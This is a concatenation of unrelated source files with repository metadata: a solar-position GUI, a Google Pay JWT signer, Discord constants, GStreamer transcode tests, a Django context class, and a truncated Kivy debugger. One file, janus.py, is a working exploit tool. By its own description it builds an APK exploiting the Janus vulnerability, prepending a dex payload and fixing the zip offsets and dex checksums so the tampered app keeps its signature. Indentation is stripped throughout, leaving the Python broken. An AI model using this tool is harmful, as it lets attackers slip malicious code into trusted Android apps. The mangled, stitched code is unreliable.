# MAIN FUNCTIONS
def init_visualizacaoGeral( windows : dict ):
# POSIÇÂO DO SOL
with dpg.window( label = 'Posição solar' , tag = 21_0, pos = [50,50], width = 500 , height = 500 , no_move = True, no_resize = True, no_collapse = True, no_close = True, no_title_bar= True ) as Posicao_sol_VG:
windows["Visualizacao geral"].append( Posicao_sol_VG )
w, h = dpg.get_item_width(2_1_0), dpg.get_item_height(2_1_0)
dpg.add_drawlist ( tag = 21_1_0, width = w-20 , height = h-50, label = 'Solar')
draw_sun_trajetory ( draw_id = 2_1_1_0, parent_id = 2_1_0 )
# VISOR DAS POSIÇÔES DO SOL - USAR GRÀFICOS - MESMO DO TOOLTIP
with dpg.window( label = 'Atuação' , tag = 22_0, no_move = True , no_resize = True, no_collapse = True, no_close = True ) as Atuacao_VG:
windows["Visualizacao geral"].append( Atuacao_VG )
dpg.add_text('Área para a atução da posição dos paineis solares')
with dpg.group( horizontal = True ):
with dpg.plot( tag = 2_2_1_0, label = 'Azimute do dia', height = 312, width = 478, anti_aliased = True ):
dpg.add_plot_legend()
dpg.add_plot_axis( dpg.mvXAxis, label = 'Hora [h]' , tag = 2_2_1_1, parent = 2_2_1_0, time = True, no_tick_labels = True ) # X
dpg.add_plot_axis( dpg.mvYAxis, label = 'Angulo [º]', tag = 2_2_1_2, parent = 2_2_1_0 ) # Y
dpg.set_axis_limits_auto( 2_2_1_1 )
dpg.set_axis_limits ( 2_2_1_2, -5, 370 )
dpg.add_line_series ( [], [], tag = 2_2_1_3, label = 'Rota diária', parent = 2_2_1_2 )
dpg.add_scatter_series ( [], [], tag = 2_2_1_4, label = 'Ponto atual', parent = 2_2_1_2 )
with dpg.plot( tag = 2_2_2_0, label = 'Altitude do dia', height = 312, width = 478, anti_aliased = True ):
dpg.add_plot_axis( dpg.mvXAxis, label = 'Hora [h]' , tag = 2_2_2_1, parent = 2_2_2_0, time = True, no_tick_labels = True ) # X
dpg.add_plot_axis( dpg.mvYAxis, label = 'Angulo [º]', tag = 2_2_2_2, parent = 2_2_2_0 ) # Y
dpg.set_axis_limits_auto( 2_2_2_1 )
dpg.set_axis_limits ( 2_2_2_2, -5, 100 )
dpg.add_plot_legend()
dpg.add_line_series ( [], [], tag = 2_2_2_3, label = 'Rota diária', parent = 2_2_2_2 )
dpg.add_scatter_series ( [], [], tag = 2_2_2_4, label = 'Ponto atual', parent = 2_2_2_2 )
att_sunpos_graphs( )
# CONFIGURAÇÔES DE TEMPO - USAR WINDOW NO HOUR_MANUAL
with dpg.window( label = 'Painel de log' , tag = 23_0, no_move = True , no_resize = True, no_collapse = True, no_close = True, no_title_bar = True ) as Painel_log_VG:
windows["Visualizacao geral"].append( Painel_log_VG )
dpg.add_text( default_value = 'Informações gerais do sistema')
with dpg.child_window( tag = 23_00, autosize_x = True, height = 170, menubar = True):
with dpg.menu_bar( tag = 23_01, label = 'menubar para datetime',):
dpg.add_menu_item( tag = 23_02, label = 'Hora automática', callback = lambda s, d, u : dpg.set_value(HORA_MANUAL, False), shortcut = 'A data e hora de calculo é definida automaticamente de acordo com a hora do controlador local')
dpg.add_menu_item( tag = 23_03, label = 'Hora manual' , callback = lambda s, d, u : dpg.set_value(HORA_MANUAL, True ), shortcut = 'A data e hora de calculo é definida pela entrada do operador no supervisório' )
with dpg.child_window( tag = 23_10):
#Informações gerais do sistema - Automático
dpg.add_text( default_value = 'Hora automática')
dpg.add_drag_floatx( tag = 23_1, label = 'Ano/Mes/Dia Auto' , size = 3, format = '%.0f', speed = 0.1 , min_value = 1 , max_value = 3000 , no_input = True )
dpg.add_drag_floatx( tag = 23_2, label = 'Hora/Min/Sec Auto' , size = 3, format = '%.0f', speed = 0.1 , no_input = True )
dpg.add_drag_int ( tag = 23_3, label = 'Valor no dia' , format = '%.0f' , speed = 0.1 , min_value = 0 , max_value = 26*3600, no_input = True, source = TOT_SECONDS, enabled = False)
dpg.add_drag_int ( tag = 23_4, label = 'Dia Juliano' , format = '%.0f' , speed = 0.1 , min_value = 0 , max_value = 366 , no_input = True, source = JULIANSDAY , enabled = False)
with dpg.child_window( tag = 23_20):
# Informações gerais do sistema - Manual
dpg.add_text( default_value = 'Hora manual')
dpg.add_input_floatx( tag = 23_6, label = 'Ano/Mes/Dia Manual' , size = 3, default_value = [2020, 12, 25], format='%.0f', min_value = 1, max_value = 3000 )
dpg.add_input_floatx( tag = 23_7, label = 'Hora/Min/Sec Manual', size = 3, default_value = [20, 30, 10] , format='%.0f', min_value = 1, max_value = 60 )
dpg.add_drag_int ( tag = 23_8, label = 'Valor no dia' , format = '%.0f', speed = 0.1 , min_value = 0, max_value = 24*3600, no_input = True, source = TOT_SECONDS, enabled = False )
dpg.add_drag_int ( tag = 23_9, label = '<NAME>' , format = '%.0f', speed = 0.1 , min_value = 0, max_value = 366 , no_input = True, source = JULIANSDAY , enabled = False )
dpg.hide_item( 23_20 ) if dpg.get_value(HORA_MANUAL) == False else dpg.hide_item( 2_3_1_0 )
dpg.add_spacer( height = 5 )
with dpg.child_window( tag = 23_30, autosize_x = True, autosize_y = True ):
# Definições de longitude e latitude local
with dpg.child_window ( height = 90 ):
dpg.add_text ( default_value = 'Definições de longitude e latitude local')
dpg.add_input_float( label = 'Latitude' , tag = 2_3_10, min_value = -90, max_value = 90, format = '%3.8f', indent=0.01, source = LATITUDE , callback = lambda sender, data, user : SUN_DATA.set_latitude( data ) )
dpg.add_spacer ( )
dpg.add_input_float( label = 'Longitude', tag = 2_3_11, min_value = -90, max_value = 90, format = '%3.8f', indent=0.01, source = LONGITUDE, callback = lambda sender, data, user : SUN_DATA.set_longitude( data ) )
dpg.add_spacer( height = 5 )
with dpg.child_window( height = 150 ):
# Informações do sol
dpg.add_text ( default_value = 'Informacoes do sol')
dpg.add_drag_float ( label = 'Azimute' , tag = 23_12, format = '%4.2f', speed = 1, no_input = True, source = AZIMUTE )
dpg.add_spacer ( )
dpg.add_drag_float ( label = 'Altitude' , tag = 23_13, format = '%4.2f', speed = 1, no_input = True, source = ZENITE )
dpg.add_spacer ( )
dpg.add_drag_float ( label = 'Elevação (m)' , tag = 23_14, format = '%4.0f', speed = 1, no_input = True, source = ALTITUDE )
dpg.add_spacer ( )
dpg.add_drag_floatx( label = 'Horas de sol' , tag = 23_15, size = 3, format = '%.0f', no_input = True )
dpg.add_spacer( height = 5 )
with dpg.child_window( height = 200 ):
# Posições de interesse
dpg.add_text ( default_value = "Posicoes de interesse", )
dpg.add_text ( default_value = 'Nascer do sol (hh/mm/ss)')
dpg.add_drag_floatx( tag = 2_3_16, size = 3, format='%.0f', speed=1, no_input= True, callback = lambda sender, data, user : dpg.set_value( H_SUNRISE , data.extend([0])) )
dpg.add_spacer ( )
dpg.add_text ( default_value = 'Culminante (hh/mm/ss)' )
dpg.add_drag_floatx( tag = 2_3_17, size = 3, format='%.0f', speed=1, no_input= True, callback = lambda sender, data, user : dpg.set_value( H_SUNSET , data.extend([0])) )
dpg.add_spacer ( )
dpg.add_text ( default_value = 'Por do sol (hh/mm/ss)' )
dpg.add_drag_floatx( tag = 2_3_18, size = 3, format='%.0f', speed=1, no_input= True, callback = lambda sender, data, user : dpg.set_value( H_CULMINANT, data.extend([0])) )
dpg.hide_item( 21_0 )
dpg.hide_item( 22_0 )
dpg.hide_item( 23_0 )
def resize_visualizacaoGeral( ):
# get the main_window dimension
w , h = dpg.get_item_width( 'mainWindow' ), dpg.get_item_height( 'mainWindow' )
dpg.configure_item( 21_0 , width = w*2/3 , height = h*3/5 , pos = [10 , 25 ] ) # DRAWING
dpg.configure_item( 22_0 , width = w*2/3 , height = (h*2/5)-35 , pos = [10 , (h*3/5)+30 ] ) # SUNPATH
dpg.configure_item( 23_0 , width = w/3 -20 , height = h - 30 , pos = [ w*2/3 +15, 25 ] ) # LOG
# get the child_window_window dimension
w1, h1 = dpg.get_item_width( 21_0 ), dpg.get_item_height( 21_0 )
dpg.configure_item( 21_10 , width = w1-20 , height = h1-50 ) # DRAWLIST
update_sun_trajetory( draw_id = 2_1_1_0 , parent_id = 2_1_0 ) # DRAWING
# SUNPATH ATT CHILD_WINDOW
dpg.configure_item( 22_10 , width = (w/3)-15 , height = (h*2/5)*0.8 , pos = [ 5 , 20 ] ) # GIRO
dpg.configure_item( 22_20 , width = (w/3)-15 , height = (h*2/5)*0.8 , pos = [ (w*2/3)//2 +5, 20 ] ) # ELEVAÇÃO
def render_visualizacaoGeral( ):
global TOT_SECONDS , JULIANSDAY, HORA_MANUAL
global HOUR, MINUTE, SECOND
global YEAR, MONTH , DAY
# Horário automático
if dpg.get_value( HORA_MANUAL ) == False :
SUN_DATA.update_date()
dpg.set_value( 23_1, value = [ dpg.get_value(YEAR), dpg.get_value(MONTH) , dpg.get_value(DAY) ] ) # DIA ATUTOMÁTICO
dpg.set_value( 23_2, value = [ dpg.get_value(HOUR), dpg.get_value(MINUTE), dpg.get_value(SECOND)] ) # HORA AUTOMÁTICA
dpg.hide_item( 23_2_0 )
dpg.show_item( 23_1_0 )
# Horário manual
else:
yearm, monthm, daym = dpg.get_value( 23_6 )[:-1]
hourm, minutem, secondm = dpg.get_value( 23_7 )[:-1]
try:
data = dt.datetime( int(yearm), int(monthm), int(daym), int(hourm), int(minutem), int(secondm) )
dt.datetime.timestamp( data )
SUN_DATA.set_date( data )
SUN_DATA.update()
dpg.set_value(YEAR , yearm )
dpg.set_value(MONTH , monthm )
dpg.set_value(DAY , daym )
dpg.set_value(HOUR , hourm )
dpg.set_value(MINUTE, minutem)
dpg.set_value(SECOND, secondm)
except:
pass
# Total de segundos no dia
dpg.set_value( 23_9, SUN_DATA.dia_juliano ) # DIA JULIANO
dpg.set_value( 23_8, SUN_DATA.total_seconds) # TOTAL DE SEGUNDOS
dpg.hide_item( 23_1_0 )
dpg.show_item( 23_2_0 )
# Setar o Azimute, Altitude e Elevação
dpg.set_value( 23_12, math.degrees( SUN_DATA.azi) ) # AZIMUTE
dpg.set_value( 23_13, math.degrees( SUN_DATA.alt) ) # ALTITUDE
dpg.set_value( 23_14, SUN_DATA.altitude ) # ELEVAÇÃO
# Seta as horas do sol calculando as horas minutos e segundos de segundos totais
diff_sunlight = (SUN_DATA.sunset - SUN_DATA.rising).seconds
dpg.set_value( 2_3_15, [diff_sunlight//3600, (diff_sunlight//60)%60 , diff_sunlight%60 ] )
# Setar as informações de Nascer do sol, Culminante (ponto mais alto) e Por do sol
dpg.set_value( 23_16, [ SUN_DATA.rising.hour+SUN_DATA.utc_local , SUN_DATA.rising.minute , SUN_DATA.rising.second ] ) # 'Nascer do sol'
dpg.set_value( 23_17, [ SUN_DATA.transit.hour+SUN_DATA.utc_local, SUN_DATA.transit.minute, SUN_DATA.transit.second ] ) # 'Culminante'
dpg.set_value( 23_18, [ SUN_DATA.sunset.hour+SUN_DATA.utc_local , SUN_DATA.sunset.minute , SUN_DATA.sunset.second ] ) # 'Por do sol'
update_sun_trajetory( draw_id = 21_1_0 , parent_id = 21_0 )
att_sunpos_graphs() | 2.59375 | 3 |
python/jwt.py | angelbarranco/passes-rest-samples | 95 | 16973 | <gh_stars>10-100
"""
Copyright 2019 Google Inc. All Rights Reserved.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import config
import time
# for jwt signing. see https://google-auth.readthedocs.io/en/latest/reference/google.auth.jwt.html#module-google.auth.jwt
from google.auth import crypt as cryptGoogle
from google.auth import jwt as jwtGoogle
#############################
#
# class that defines JWT format for a Google Pay Pass.
#
# to check the JWT protocol for Google Pay Passes, check:
# https://developers.google.com/pay/passes/reference/s2w-reference#google-pay-api-for-passes-jwt
#
# also demonstrates RSA-SHA256 signing implementation to make the signed JWT used
# in links and buttons. Learn more:
# https://developers.google.com/pay/passes/guides/get-started/implementing-the-api/save-to-google-pay
#
#############################
class googlePassJwt:
def __init__(self):
self.audience = config.AUDIENCE
self.type = config.JWT_TYPE
self.iss = config.SERVICE_ACCOUNT_EMAIL_ADDRESS
self.origins = config.ORIGINS
self.iat = int(time.time())
self.payload = {}
# signer for RSA-SHA256. Uses same private key used in OAuth2.0
self.signer = cryptGoogle.RSASigner.from_service_account_file(config.SERVICE_ACCOUNT_FILE)
def addOfferClass(self, resourcePayload):
self.payload.setdefault('offerClasses',[])
self.payload['offerClasses'].append(resourcePayload)
def addOfferObject(self, resourcePayload):
self.payload.setdefault('offerObjects',[])
self.payload['offerObjects'].append(resourcePayload)
def addLoyaltyClass(self, resourcePayload):
self.payload.setdefault('loyaltyClasses',[])
self.payload['loyaltyClasses'].append(resourcePayload)
def addLoyaltyObject(self, resourcePayload):
self.payload.setdefault('loyaltyObjects',[])
self.payload['loyaltyObjects'].append(resourcePayload)
def addGiftcardClass(self, resourcePayload):
self.payload.setdefault('giftCardClasses',[])
self.payload['giftCardClasses'].append(resourcePayload)
def addGiftcardObject(self, resourcePayload):
self.payload.setdefault('giftCardObjects',[])
self.payload['giftCardObjects'].append(resourcePayload)
def addEventTicketClass(self, resourcePayload):
self.payload.setdefault('eventTicketClasses',[])
self.payload['eventTicketClasses'].append(resourcePayload)
def addEventTicketObject(self, resourcePayload):
self.payload.setdefault('eventTicketObjects',[])
self.payload['eventTicketObjects'].append(resourcePayload)
def addFlightClass(self, resourcePayload):
self.payload.setdefault('flightClasses',[])
self.payload['flightClasses'].append(resourcePayload)
def addFlightObject(self, resourcePayload):
self.payload.setdefault('flightObjects',[])
self.payload['flightObjects'].append(resourcePayload)
def addTransitClass(self, resourcePayload):
self.payload.setdefault('transitClasses',[])
self.payload['transitClasses'].append(resourcePayload)
def addTransitObject(self, resourcePayload):
self.payload.setdefault('transitObjects',[])
self.payload['transitObjects'].append(resourcePayload)
def generateUnsignedJwt(self):
unsignedJwt = {}
unsignedJwt['iss'] = self.iss
unsignedJwt['aud'] = self.audience
unsignedJwt['typ'] = self.type
unsignedJwt['iat'] = self.iat
unsignedJwt['payload'] = self.payload
unsignedJwt['origins'] = self.origins
return unsignedJwt
def generateSignedJwt(self):
jwtToSign = self.generateUnsignedJwt()
signedJwt = jwtGoogle.encode(self.signer, jwtToSign)
return signedJwt
| 2 | 2 |
janus.py | caxmd/januus | 83 | 16974 | <filename>janus.py
# Includes some code derived from the cpython project.
# Source: https://github.com/python/cpython/blob/master/Lib/zipfile.py
# Excuse the mess.
import argparse
from hashlib import sha1
import os
import struct
from zipfile import _EndRecData, ZipFile
from zlib import adler32
_ECD_SIGNATURE = 0
_ECD_DISK_NUMBER = 1
_ECD_DISK_START = 2
_ECD_ENTRIES_THIS_DISK = 3
_ECD_ENTRIES_TOTAL = 4
_ECD_SIZE = 5
_ECD_OFFSET = 6
_ECD_COMMENT_SIZE = 7
structEndArchive = b"<4s4H2LH"
stringEndArchive = b"PK\005\006"
structCentralDir = "<4s4B4HL2L5H2L"
stringCentralDir = b"PK\001\002"
_DEX_MAGIC = 0
_DEX_CHECKSUM = 1
_DEX_SIGNATURE = 2
_DEX_FILE_SIZE = 3
structDexHeader = "<8sI20sI"
def get_centdirs(filelist):
arr = b""
for zinfo in filelist:
dt = zinfo.date_time
dosdate = (dt[0] - 1980) << 9 | dt[1] << 5 | dt[2]
dostime = dt[3] << 11 | dt[4] << 5 | (dt[5] // 2)
file_size = zinfo.file_size
compress_size = zinfo.compress_size
header_offset = zinfo.header_offset
extra_data = zinfo.extra
min_version = 0
extract_version = max(min_version, zinfo.extract_version)
create_version = max(min_version, zinfo.create_version)
filename, flag_bits = zinfo._encodeFilenameFlags()
centdir = struct.pack(structCentralDir,
stringCentralDir, create_version,
zinfo.create_system, extract_version, zinfo.reserved,
flag_bits, zinfo.compress_type, dostime, dosdate,
zinfo.CRC, compress_size, file_size,
len(filename), len(extra_data), len(zinfo.comment),
0, zinfo.internal_attr, zinfo.external_attr,
header_offset)
arr += centdir
arr += filename
arr += extra_data
arr += zinfo.comment
return arr
def pack_endrec(endrec):
return struct.pack(
structEndArchive,
endrec[_ECD_SIGNATURE],
endrec[_ECD_DISK_NUMBER],
endrec[_ECD_DISK_START],
endrec[_ECD_ENTRIES_THIS_DISK],
endrec[_ECD_ENTRIES_TOTAL],
endrec[_ECD_SIZE],
endrec[_ECD_OFFSET],
endrec[_ECD_COMMENT_SIZE]
)
def get_endrec(file):
pos = file.tell()
endrec = _EndRecData(file)
file.seek(pos)
return endrec
def sort_info(info):
if info.filename.startswith("META-INF"):
return "Z"
else:
return "A"
def get_dex_header(data):
return list(struct.unpack(structDexHeader, data[0:0x24]))
def pack_dex_header(header):
return struct.pack(
structDexHeader,
header[_DEX_MAGIC],
header[_DEX_CHECKSUM],
header[_DEX_SIGNATURE],
header[_DEX_FILE_SIZE]
)
def make_dex_header(header, file_data, final_size):
header[_DEX_FILE_SIZE] = final_size
packed_header = pack_dex_header(header)
signature = sha1()
signature.update(packed_header[0x20:] + file_data)
header[_DEX_SIGNATURE] = signature.digest()
header[_DEX_CHECKSUM] = adler32(
header[_DEX_SIGNATURE] +
packed_header[0x20:] +
file_data
)
return pack_dex_header(header)
parser = argparse.ArgumentParser(description="Creates an APK exploiting the Janus vulnerability.")
parser.add_argument("apk_in", metavar="original-apk", type=str,
help="the source apk to use")
parser.add_argument("dex_in", metavar="dex-file", type=str,
help="the dex file to prepend")
parser.add_argument("apk_out", metavar="output-apk", type=str,
help="the file to output to")
args = parser.parse_args()
with ZipFile(args.apk_in, "r") as apk_in_zip, open(args.apk_in, "rb") as apk_in, open(args.dex_in, "rb") as dex_in, open(args.apk_out, "wb") as apk_out:
dex_data = dex_in.read()
dex_header = get_dex_header(dex_data)
dex_size = os.path.getsize(args.dex_in)
orig_endrec = get_endrec(apk_in)
new_endrec = get_endrec(apk_in)
new_endrec[_ECD_OFFSET] = new_endrec[_ECD_OFFSET] + dex_size
final_size = os.path.getsize(args.apk_in) + dex_size
apk_in_zip.filelist = sorted(apk_in_zip.filelist, key=sort_info)
infolist = apk_in_zip.infolist()
for info in infolist:
info.date_time = (2042, 14, 3, 0, 62, 18)
info.header_offset = info.header_offset + dex_size
out_bytes = b""
out_bytes += dex_data[0x24:]
out_bytes += apk_in.read()[:orig_endrec[_ECD_OFFSET]]
out_bytes += get_centdirs(infolist)
out_bytes += pack_endrec(new_endrec)
out_bytes = make_dex_header(dex_header, out_bytes, final_size) + out_bytes
apk_out.write(out_bytes) | 2.140625 | 2 |
constants.py | phy1um/tmtc-discord-bot | 0 | 16975 |
ANNOUNCEMENT_ROLE = "941805571915513857"
GUILD_ID = "878926572235665418"
| 0.953125 | 1 |
test/gst-msdk/transcode/mpeg2.py | haribommi/vaapi-fits | 0 | 16976 | ##
### Copyright (C) 2018-2019 Intel Corporation
###
### SPDX-License-Identifier: BSD-3-Clause
###
from ....lib import *
from ..util import *
from .transcoder import TranscoderTest
spec = load_test_spec("mpeg2", "transcode")
class to_avc(TranscoderTest):
@slash.requires(*have_gst_element("msdkh264enc"))
@slash.requires(*have_gst_element("msdkh264dec"))
@slash.requires(*have_gst_element("msdkmpeg2dec"))
@slash.parametrize(*gen_transcode_1to1_parameters(spec, "avc", "hwhw"))
@platform_tags(set(MPEG2_DECODE_PLATFORMS) & set(AVC_ENCODE_PLATFORMS))
def test_hwhw_1to1(self, case):
vars(self).update(spec[case].copy())
vars(self).update(
dstextension = 'h264',
case = case,
mode = 'hwhw',
trans_type = 'mpeg2_to_h264',
gsttrans = 'mpegvideoparse ! msdkmpeg2dec ! msdkh264enc ! video/x-h264,profile=main ! h264parse',
gstdecoder1 = 'mpegvideoparse ! msdkmpeg2dec',
gstdecoder2 = 'h264parse ! msdkh264dec',
)
self.transcode_1to1()
class to_hevc(TranscoderTest):
@slash.requires(*have_gst_element("msdkh265enc"))
@slash.requires(*have_gst_element("msdkh265dec"))
@slash.requires(*have_gst_element("msdkmpeg2dec"))
@slash.parametrize(*gen_transcode_1to1_parameters(spec, "hevc", "hwhw"))
@platform_tags(set(MPEG2_DECODE_PLATFORMS) & set(HEVC_ENCODE_8BIT_PLATFORMS))
def test_hwhw_1to1(self, case):
vars(self).update(spec[case].copy())
vars(self).update(
dstextension = 'h265',
case = case,
mode = 'hwhw',
trans_type = 'mpeg2_to_h265',
gsttrans = 'mpegvideoparse ! msdkmpeg2dec ! msdkh265enc ! video/x-h265,profile=main ! h265parse',
gstdecoder1 = 'mpegvideoparse ! msdkmpeg2dec',
gstdecoder2 = 'h265parse ! msdkh265dec',
)
self.transcode_1to1()
class to_mjpeg(TranscoderTest):
@slash.requires(*have_gst_element("msdkmjpegenc"))
@slash.requires(*have_gst_element("msdkmjpegdec"))
@slash.requires(*have_gst_element("msdkmpeg2dec"))
@slash.parametrize(*gen_transcode_1to1_parameters(spec, "mjpeg", "hwhw"))
@platform_tags(set(MPEG2_DECODE_PLATFORMS) & set(JPEG_ENCODE_PLATFORMS))
def test_hwhw_1to1(self, case):
vars(self).update(spec[case].copy())
vars(self).update(
dstextension = 'mjpeg',
case = case,
mode = 'hwhw',
trans_type = 'mpeg2_to_mjpeg',
gsttrans = 'mpegvideoparse ! msdkmpeg2dec ! msdkmjpegenc ! jpegparse',
gstdecoder1 = 'mpegvideoparse ! msdkmpeg2dec',
gstdecoder2 = 'jpegparse ! msdkmjpegdec',
)
self.transcode_1to1()
class to_mpeg2(TranscoderTest):
@slash.requires(*have_gst_element("msdkmpeg2enc"))
@slash.requires(*have_gst_element("msdkmpeg2dec"))
@slash.parametrize(*gen_transcode_1to1_parameters(spec, "mpeg2", "hwhw"))
@platform_tags(set(MPEG2_DECODE_PLATFORMS) & set(MPEG2_ENCODE_PLATFORMS))
def test_hwhw_1to1(self, case):
vars(self).update(spec[case].copy())
vars(self).update(
dstextension = 'm2v',
case = case,
mode = 'hwhw',
trans_type = 'mpeg2_to_mpeg2',
gsttrans = 'mpegvideoparse ! msdkmpeg2dec ! msdkmpeg2enc ! mpegvideoparse',
gstdecoder1 = 'mpegvideoparse ! msdkmpeg2dec',
gstdecoder2 = 'mpegvideoparse ! msdkmpeg2dec',
)
self.transcode_1to1()
| 2.0625 | 2 |
rusel/base/context.py | ruslan-ok/ruslan | 0 | 16977 | import os, time, mimetypes, glob
from django.utils.translation import gettext_lazy as _
from django.urls import reverse
from task.const import *
from task.models import Task, detect_group
from rusel.base.config import Config
from rusel.base.forms import CreateGroupForm
from rusel.context import get_base_context
from rusel.utils import extract_get_params
class Context:
def set_config(self, config, cur_view):
self.config = Config(config, cur_view)
def get_app_context(self, user_id, search_qty=None, icon=None, nav_items=None, **kwargs):
context = {}
if hasattr(self, 'object') and self.object:
title = self.object.name
else:
if 'title' in kwargs:
title = kwargs['title']
else:
title = _(self.config.title).capitalize()
nav_item = None
if (Task.get_nav_role(self.config.app) != self.config.get_cur_role()):
nav_item = Task.get_active_nav_item(user_id, self.config.app)
if nav_item:
title = (title, nav_item.name)
context['nav_item'] = nav_item
context.update(get_base_context(self.request, self.config.app, self.config.get_cur_role(), self.config.cur_view_group, (hasattr(self, 'object') and self.object != None), title, icon=icon))
context['fix_list'] = self.get_fixes(self.config.views, search_qty)
context['group_form'] = CreateGroupForm()
context['config'] = self.config
context['params'] = extract_get_params(self.request, self.config.group_entity)
if nav_items:
context['nav_items'] = nav_items
context['add_item_placeholder'] = '{} {}'.format(_('add').capitalize(), self.config.item_name if self.config.item_name else self.config.get_cur_role())
if self.config.add_button:
context['add_item_template'] = 'base/add_item_button.html'
else:
context['add_item_template'] = 'base/add_item_input.html'
if (self.config.group_entity in self.request.GET):
context['current_group'] = self.request.GET[self.config.group_entity]
elif ('ret' in self.request.GET):
context['current_group'] = self.request.GET['ret']
return context
def get_sorts(self, sorts):
ret = []
for sort in sorts:
ret.append({'id': sort[0], 'name': _(sort[1]).capitalize()})
return ret
def get_fixes(self, views, search_qty):
fixes = []
if (self.config.app == APP_ALL):
common_url = reverse('index')
else:
common_url = reverse(self.config.app + ':list')
nav_item=Task.get_active_nav_item(self.request.user.id, self.config.app)
for key, value in views.items():
url = common_url
determinator = 'view'
view_id = self.config.main_view
if (view_id != key):
if ('role' in value):
determinator = 'role'
view_id = value['role']
url += view_id + '/'
else:
view_id = key
if (key != self.config.main_view):
if ('page_url' in value):
url += value['page_url'] + '/'
else:
url += '?view=' + key
if (self.config.app in FOLDER_NAV_APPS):
folder = ''
if ('folder' in self.request.GET):
folder = self.request.GET['folder']
if folder:
if ('?' in url):
url += '&'
else:
url += '?'
url += 'folder=' + folder
hide_qty = False
if ('hide_qty' in value):
hide_qty = value['hide_qty']
if hide_qty:
qty = None
else:
if (view_id == self.config.group_entity):
_nav_item = None
else:
_nav_item = nav_item
fix_group = detect_group(self.request.user, self.config.app, determinator, view_id, _(value['title']).capitalize())
qty = self.get_view_qty(fix_group, _nav_item)
active = (self.config.cur_view_group.determinator == determinator) and (self.config.cur_view_group.view_id == view_id)
fix = {
'determinator': determinator,
'id': view_id,
'url': url,
'icon': value['icon'],
'title': _(value['title']).capitalize(),
'qty': qty,
'active': active,
'search_qty': search_qty,
}
fixes.append(fix)
return fixes
def get_view_qty(self, group, nav_item):
data = self.get_dataset(group, nav_item=nav_item)
return len(data)
def get_dataset(self, group, query=None, nav_item=None):
if (group.determinator == 'role'):
cur_role = group.view_id
else:
cur_role = self.config.base_role
data = Task.get_role_tasks(self.request.user.id, self.config.app, cur_role, nav_item)
if (self.config.app == APP_ALL) and (not query):
return data
if data and ((not group.determinator) or (group.determinator == 'group')):
data = data.filter(groups__id=group.id)
# if (not group.completed):
# data = data.filter(completed=False)
if hasattr(self, 'tune_dataset'):
return self.tune_dataset(data, group)
return data
def get_nav_items(self):
nav_role = Task.get_nav_role(self.config.app)
if (not nav_role) or (nav_role == self.config.cur_view_group.view_id):
return None
href = self.request.path
if ('pk' in self.kwargs):
pk = str(self.kwargs['pk']) + '/'
if (pk in href):
href = href.split(pk)[0]
sort = 'name'
nav_item_group = detect_group(self.request.user, self.config.app, 'role', nav_role, '')
if nav_item_group and nav_item_group.items_sort:
sort = nav_item_group.items_sort
ret = []
for item in Task.get_role_tasks(self.request.user.id, self.config.app, nav_role).order_by(sort):
ret.append({
'id': item.id,
'name': item.name,
'qty': len(Task.get_role_tasks(self.request.user.id, self.config.app, self.config.cur_view_group.view_id, item)),
'href': href,
})
return ret
class DirContext(Context):
def get_context_data(self, **kwargs):
self.config.set_view(self.request)
self.object = None
self.cur_folder = ''
page_title = ''
title = ''
if ('folder' in self.request.GET):
self.cur_folder = self.request.GET['folder']
page_title = self.cur_folder.split('/')[-1:][0]
title = self.cur_folder
if not self.cur_folder:
page_title = _(self.config.app_title)
title = page_title
kwargs.update({'title': page_title})
dir_tree = []
self.scan_dir_tree(dir_tree, self.cur_folder, self.store_dir.rstrip('/'))
self.scan_files()
self.object = None
context = super().get_context_data(**kwargs)
upd_context = self.get_app_context(self.request.user.id, None, icon=self.config.view_icon, nav_items=None, **kwargs)
context.update(upd_context)
context['title'] = title
context['dir_tree'] = dir_tree
context['file_list'] = self.file_list
context['gps_data'] = self.gps_data
if (self.config.cur_view_group.determinator == 'view') and (self.config.cur_view_group.view_id != self.config.main_view):
context['cur_view'] = self.config.cur_view_group.view_id
context['theme_id'] = 24
context['cur_folder'] = self.cur_folder
return context
def scan_dir_tree(self, dir_tree, cur_folder, path, parent=None, demo=False):
ld = glob.glob(path + '/*/')
if not len(ld):
return
node = ''
level = 0
if parent:
node = parent['node']
if node:
node += '/'
node += parent['name']
level = parent['level'] + 1
s_node = node
if node:
s_node = node + '/'
p = path
for d in ld:
dd = d.replace('\\', '/')
name = dd.split(p)[1].strip('/')
x = {
'node': node,
'name': name,
'active': (cur_folder == s_node + name),
'level': level,
'qty': 0,
}
dir_tree.append(x)
if not demo:
self.scan_dir_tree(dir_tree, cur_folder, path + '/' + name, x)
def scan_files(self):
self.gps_data = []
self.file_list = []
with os.scandir(self.store_dir + self.cur_folder) as it:
for entry in it:
if (entry.name.upper() == 'Thumbs.db'.upper()):
continue
if entry.is_dir():
continue
ff = self.store_dir + self.cur_folder + '/' + entry.name
mt = mimetypes.guess_type(ff)
file_type = ''
if mt and mt[0]:
file_type = mt[0]
self.file_list.append({
'name': entry.name,
'href': 'file/?folder=' + self.cur_folder + '&file=' + entry.name,
'date': time.ctime(os.path.getmtime(ff)),
'type': file_type,
'size': self.sizeof_fmt(os.path.getsize(ff)),
})
return self.gps_data
def sizeof_fmt(self, num, suffix='B'):
for unit in ['', 'K', 'M', 'G', 'T', 'P', 'E', 'Z']:
if abs(num) < 1024.0:
return f'{num:3.1f}{unit}{suffix}'
num /= 1024.0
return f'{num:.1f}Yi{suffix}'
| 1.90625 | 2 |
deepdiy/plugins/system/debugger/debugger.py | IEWbgfnYDwHRoRRSKtkdyMDUzgdwuBYgDKtDJWd/diy | 57 | 16978 | <filename>deepdiy/plugins/system/debugger/debugger.py
import os,rootpath
rootpath.append(pattern='main.py') # add the directory of main.py to PATH
import glob
from kivy.app import App
from kivy.lang import Builder
from kivy.properties import ObjectProperty,DictProperty,ListProperty
from kivy.uix.boxlayout import BoxLayout
import logging,importlib,pkgutil
class Debugger(BoxLayout):
"""docstring for Debugger."""
data=ObjectProperty()
debug_packages = ListProperty()
bundle_dir = rootpath.detect(pattern='main.py') # Obtain the dir of main.py
# Builder.load_file(bundle_dir +os.sep+'ui'+os.sep+'demo.kv')
def __init__(self):
super(Debugger, self).__init__()
self.collect_debug_packages()
self.run_debug_packages()
def collect_debug_packages(self):
for importer, modname, ispkg in pkgutil.walk_packages(
